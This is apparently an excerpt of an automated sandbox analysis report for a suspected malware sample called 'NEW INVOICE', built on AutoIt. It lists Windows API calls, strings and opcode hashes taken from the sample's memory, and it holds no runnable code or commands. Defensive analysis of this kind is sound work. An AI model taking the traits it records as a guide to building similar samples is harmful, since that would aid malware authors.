                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                    • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                    • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                    • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                    • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                    • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                    • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                    • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                    • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                    • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: htonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 3832099526-2422070025
                                                                                    • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                    • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                    • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                    • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 455545452-1403004172
                                                                                    • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                    • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                    • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                    • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: InternetOpen
                                                                                    • String ID: <local>
                                                                                    • API String ID: 2038078732-4266983199
                                                                                    • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                    • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                    • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                    • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 455545452-1403004172
                                                                                    • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                    • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                    • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                    • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                    APIs
                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                    • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen
                                                                                    • String ID: ComboBox$ListBox
                                                                                    • API String ID: 455545452-1403004172
                                                                                    • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                    • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                    • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                    • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strncmp
                                                                                    • String ID: ,$UTF8)
                                                                                    • API String ID: 909875538-2632631837
                                                                                    • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                    • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                    • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                    • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strncmp
                                                                                    • String ID: ,$UTF8)
                                                                                    • API String ID: 909875538-2632631837
                                                                                    • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                    • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                    • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                    • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • wsprintfW.USER32 ref: 004560E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 1262938277-328681919
                                                                                    • Opcode ID: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                    • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                    • Opcode Fuzzy Hash: 5e9390f3fa6d631e890f8db483ee3f325bf10843f83bb080d9b0d170336394c6
                                                                                    • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                    • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                    • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                    • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                    • PostMessageW.USER32(00000000), ref: 00442247
                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                    • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                    • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                    • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                      • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                    • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                    • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                    • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E